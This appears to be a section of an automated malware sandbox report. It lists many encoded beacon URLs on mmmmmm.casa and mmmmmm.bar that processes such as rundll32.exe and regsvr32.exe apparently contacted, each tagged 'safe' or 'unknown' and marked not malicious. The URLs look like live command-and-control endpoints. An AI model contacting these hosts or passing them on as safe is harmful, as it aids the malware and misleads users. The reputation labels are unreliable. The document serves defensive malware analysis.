                    http://mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hDa7_2/FbVDmbRn7bFA6hDIsg/qnhgHlt_2/Fn9gwy0xq3B1YpmIEOZM/i42uyk5dSn9gOG1Mrjl/gu0_2FGrgMcGgkRkxMvgEt/d2e52UUAd9X_2/FPiKiGt8/8igoSobBPUnwfzWxm1snqpo/33m84b1CoD/HFsz2OpMmuL6t_2Fc/dN61skszAki/D0m0Ko.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/yX2jPs_2FJk7BOaoQtgEiU6/nNQbGh1LU5/204V5EdINWf_2Fd_2/Byf2ExfvNDDz/y_2Fb3qYGFh/SHRXx42ELD51Zr/XViRRzGoc_2F4jsc8S8bJ/kkycv_2BQtVp8DJR/58ep6_2B48AsJVM/1TJuRFxQ3h_2BgvPWU/76cupQFL1/gc_2FubwNTN_2Btz6mOf/SjHCTvdm4okJzy8v6JD/crLXxtBjvbV2b1S_2Flfq_/2Ba_2B_2F_2B_/2BuyHAC7/0QIAnvbOfT2cDi_2B_2FiQ/y.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/EvNJYH1hit_2B/S_2FBSev/L6PRTXShrXbJ8nSbnHyL3kk/rxSkNCwe_2/FwMR5MuV_2Fgl3qPB/c6WKRAyG2mKK/EyMV4RPRN72/UBYRZyU7kLOVPK/eMDHC4ySlSv07nKtMx_2B/GdNtuquoq_2BZzhi/xfSg95Fx7okthXg/kTApiXXVCdgTGD_2Bz/_2Fp8iqr_/2BK8IeDoGoTnVf4v953h/YveRYe4a_2F0zB8eMbv/jnoXt_2BSI1PiRRfVToPJG/Eiyhp6P4/p.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/1QOwg_2FLZb/YxejGgbNFeCdhh/1gjuax4E3bxF4PQuVvUoz/mWe6jb2568sC8c53/IkV5WVtme_2FISC/QrKvSVSdIRQPViUnPj/3Fw_2FGBy/ougDsh_2BOgImgeL_2FQ/ksdlSb4g_2Fwrah6M24/q_2B2b3zRP7YanP8WhJAas/H3R9cX2XSL2XN/g1is_2Fx/5fxgjLlEiN4fVMRrNvIC_2B/BMY9igRITe/bCdqDPjTj_2BNJVhj/TVNqqBqkq6Cf/FXwLJI8.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/X4p6u_2FetthGmAcz/bQsew8zG_2Fh/9P0GZIddIT6/tsqFDffw1JfZI9/7Wxh6S1430ERGHqXnGdSL/l2H1dC_2BJRz8P7u/WHLfWZFpRyuCPoH/N2btBoZMI6viPyh1IZ/3zpHhEkuK/H3QK2eSVqiaA4sXJAvW0/6PC2c0KwbRckfLHWg95/iUWpcL_2BkbYAUGuJiXEcw/5QgCHV4YQT1Aj/V_2FUI3k/q3ooEApLg6Zz6wvYePIaFqO/CEyO7MK.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/UW7u_2BFcze6Mn2V_/2F_2Ft6gfpjU/ji7Rx8VjY5w/9WflMmm_2Fmqb8/zBvQVjE0mqHlUZGMuEXTB/HEwR8WQpXxRM89oN/1cAqp1w8pPdeEz3/VIGd3IQjbLDnwpHP8K/7_2FeYyHT/464Qd9W8LhgOHL3Pj2aR/oq0Ng3p2PFGkfuSjaPw/_2BM_2BmxSzjLXgbDT3iEr/vDQWplVFAGepF/qn9lk8tr/bJ5cKP99gfc_2BeSGYfAwTs/d9FajJ_2F/2hdyIN.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy1IRnoBB2dOL6/ewPhtQKmX/4vEptWmInKNSCCelbBJL/QsUTl3MG8W_2FUT5c4I/Wbyh4OWkqK5LNO5yhmAMAh/lEvQjX_2BglB2/ZgXdboWB/keU0AsD3UcwLpfPRqdjUowu/0EDp5luYWq/WPk0AaCP_2BNIdyuD/JX2Aa27OteSX/ayBPWZC0Qw7/E.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/b2TutLAUt/AAkTh80PEBTPVx2M0WWz/tHvwOMh8DE9FVgCx1wM/pJTiDXRlbJxqfbcaYjX5Aq/xCQnCU6grrmEK/Ka7HR80A/TmWv25imPh8Z_2BcgVOt5nj/QijDrP3tT2/6YeGxMk3j75w8Aikb/RCKd7NWKWRFy/_2FNkg_2Bmn/kDUMQ77ACMzaRB/KgTon1Dhj_2B6os2nyWq3/jAJbWCr5_2BhSnCM/GMDLVwQOesflZEg/izlI5VZPkbeCb/R6.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_/2FAMgHsn7E9l6Q/B2WdGNnEZeMYZT3QqC9Nb/N3lrV5YafsC12ABW/3hwoiF9qB_2BZlH/icXT_2FOzkY5vJqst2/OVKX2yVdz/OWKBhlP93CQx3biHTKAg/kpFy9_2Fi1YHFZAcNn8/Dcq8SZvuWCYV0A8EYdfSFx/Y6Ue4WL_2FV7S/fsUD_2BIU/82.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KAsztIp/rbZR9n25d8s1swM9G24/POlK7PosNEdgyRGUG2gH4G/osPJ_2FYmTltK/5jx6Pdhk/9DHJnQIClt_2FzdZ9oWmGhV/bMMH_2BIn1/yEJsp_2FrcbHarv5V/n7FSL8uXWBw2/H_2Bf_2Fn_2/BR1KjYbSHqEZ_2/FMDrsqXqBz9zvxWljk5WA/R1oCBo4gMgLTWO4D/t_2Bn0elq/j7rqu.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://mmmmmm.bar/drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtfbTjlBBgMhMk/405GTqbwj/DLVrqcPBLK3OU_2B5YkW/NfdWgV7ntKvAos8wcTJ/lj70qHp4Em0zMPinA_2BYb/YrcsOfvA5cCI_/2FwArLU4/kwV47_2Ft0B_2BSMsMg0c11/8bx_2F0s6i/XF9Vmsy5pH6_2FDZf/Pr14EuOYxzk9/eg_2FVXSSo5/Nagf3id_/2B1A0aF.jlktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlktrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://mmmmmm.bar/drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtf{99D3DE7B-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.macromedia.comSwFlsh32.dllfalse
                      		high
                      http://mmmmmm.casa/rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idrundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6eloaddll32.exe, 00000000.00000003.595053007.0000000001473000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.594959193.0000000001473000.00000004.00000001.sdmp, ~DF635DEF1629836875.TMP.39.dr, {99D3DE79-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0rerundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/eEhDmx0a4sdxsRnzPb9hc_2/BoO73Mi9GS/E9f2sOeyD62Bdbz85/pt5vTSpE5LaM/nbIIyujSEBLrundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/hM1upiDM4s78JFaPrfyW/3DWkoBXDYr7rgMt3xG_/2BGXIAeEHHsslby_2Fk_2B/XjQKcdsES34ikrundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jRregsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZrundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay{8A93412C-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.dr, ~DF6BE4FBC691CAB6A8.TMP.32.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePrundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/f7rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/EvNJYH1hit_2B/S_2FBSev/L6PRTXShrXbJ8nSbnHyL3kk/rxSkNCwe_2/FwMR5MuV_2Fgl3qPB/c{787ACDA5-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3Hv~DF8B1684F7EAB925CF.TMP.32.dr, {8A934128-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/drew/5Ri1regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp~DF2AF264C75EBCEA8B.TMP.45.dr, {AAFB84CF-73DB-11EC-90E5-ECF4BB2D2496}.dat.45.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/yX2jPs_2FJk7BOaoQtgEiU6/nNQbGh1LU5/204V5EdINWf_2Fd_2/Byf2ExfvNDDz/y_2Fb3qYGFhregsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mmmmmm.bar/drew/QBjwt7f9IP4GJ_2FI3i/c0aa6REvsF1jEZ9Gt73OXW/MtCcAk2KHvQUZ/TFCEWwi_/2FYGGLslYtrregsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8Irundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJrundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.symauth.com/cps0(SwFlsh32.dllfalse
                        		high
                        http://mmmmmm.bar/drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KArundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mmmmmm.bar/drew/pqebeo2lkpXDanz/ytpUleK_2FpNL5M/WaawzvJKNJXUgj1ad/bF_2B89Mrundll32.exe, 00000004.00000002.873683904.00000000051CB000.00000004.00000010.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/rundll32.exe, 00000004.00000002.872832088.0000000003522000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.symauth.com/rpa00SwFlsh32.dllfalse
                          		high
                          http://mmmmmm.bar/drew/_2FqRGYaq3iNgnfYUBd/UHuyRkDahjgLnMh3n18sF3/AB_2B8MfNm8lr/WF50_2FD/4gDnApI5ztD{5DB6AF8C-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DF2E9EF23EC6AEF09A.TMP.10.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsrundll32.exe, 00000004.00000003.647377507.0000000003536000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkregsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/UW7u_2BFcze6Mn2V_/2F_2Ft6gfpjU/ji7Rx8VjY5w/9WflMmm_2Fmqb8/zBvQVjE0mqHlUZGMuEXloaddll32.exe, 00000000.00000003.532745537.0000000001473000.00000004.00000001.sdmp, {8A934126-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.dr, ~DFB3283CE4740C455F.TMP.32.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5a{5DB6AF8E-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DFBDA07BC0B99F7EB4.TMP.10.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.casa/drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzP~DFE80EA9EDE4764E6F.TMP.32.dr, {8A93412A-73DB-11EC-90E5-ECF4BB2D2496}.dat.32.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/X4p6u_2FetthGmAcz/bQsew8zG_2Fh/9P0GZIddIT6/tsqFDffw1JfZI9/7Wxh6S1430ERGHqXnGdrundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.casaregsvr32.exe, 00000002.00000003.603899610.0000000003260000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.casa/drew/XywyoiTttJTDU8v/K3707uO1SfrgHYPfXh/Csk9b4vhf/8V4G3vJbaghQgcloaddll32.exe, 00000000.00000002.871350910.00000000034EA000.00000004.00000010.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/Ds1R78N_2Bgd/ksR5C2XbSKO/Yc7k5ktFVIid8i/gXsvixQHwiS_2FpA0dw3G/N_2Bpuch8xfCgVi{99D3DE7D-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/b2TutLAUt/AAkTh80PEBTPVx2M0WWz/tHvwOMh8DE9FVgCx1wM/pJTiDXRlbJxqfbcaYjX5Aq/xCQloaddll32.exe, 00000000.00000003.740005035.0000000001466000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCloaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hD{787ACDA9-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.dr, ~DF5AFE25FDEA321026.TMP.20.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mmmmmm.bar/drew/1QOwg_2FLZb/YxejGgbNFeCdhh/1gjuax4E3bxF4PQuVvUoz/mWe6jb2568sC8c53/IkV5WVtme_2{5DB6AF90-73DB-11EC-90E5-ECF4BB2D2496}.dat.10.dr, ~DF584F6E0A1DD704BA.TMP.10.drfalse
                          • Avira URL Cloud: safe
                          		unknown
